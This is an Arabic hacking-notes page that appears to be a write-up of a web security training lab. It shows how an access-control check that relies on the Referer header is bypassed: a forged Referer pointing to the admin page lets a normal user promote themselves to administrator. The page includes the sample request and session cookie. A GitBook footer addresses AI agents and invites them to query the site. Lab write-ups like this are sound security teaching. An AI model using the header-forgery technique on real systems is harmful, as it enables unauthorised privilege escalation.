> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/access-control/access-control-based-on-the-referer-header.md).

# التحكم في الوصول بناءً على ترويسة Referer

### التحكم في الوصول المستند إلى Referer

يطبق هذا المختبر تحكمًا في الوصول إلى ميزات الإدارة استنادًا إلى الترويسة **Referer**. / يمكنك أولًا استكشاف لوحة الإدارة بالاتصال باستخدام **administrator:admin** بيانات الاعتماد.

لحل المختبر، تحتاج إلى تسجيل الدخول باستخدام المستخدم **wiener:peter** واستخدام التحقق الخاطئ من Referer للحصول على دور مسؤول.

#### **1. السياق**

* ملف تعريف ارتباط الجلسة لـ *wiener*

```bash
cIA2AyZn2GhizvLK7VR8SUCMcdezZcFl
```

* عند محاولة تغيير الأدوار بدون ترويسة إضافية، يرفض التطبيق الوصول:

```http
GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a19008c034b40de834b14e0009a0062.web-security-academy.net
Cookie: session=cIA2AyZn2GhizvLK7VR8SUCMcdezZcFl
```

<figure><img src="/files/2d85774163a1b60502ab78767ba323a1cf14589d" alt=""><figcaption></figcaption></figure>

تشير الاستجابة إلى أن المستخدم لا يملك الصلاحيات اللازمة.

#### **2. تجاوز فحص Referer**

إذا أُضيفت ترويسة **Referer** تشير إلى صفحة إدارة شرعية، يقبل التطبيق العملية

```bash
Referer: https://0a19008c034b40de834b14e0009a0062.web-security-academy.net/admin
```

مع هذه الترويسة المضافة، يصبح من الممكن ترقية wiener ويتم الحصول على وصول المسؤول.

<figure><img src="/files/33ec45371b7f498ed94b38f0dff1d0e100758cf0" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/access-control/access-control-based-on-the-referer-header.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
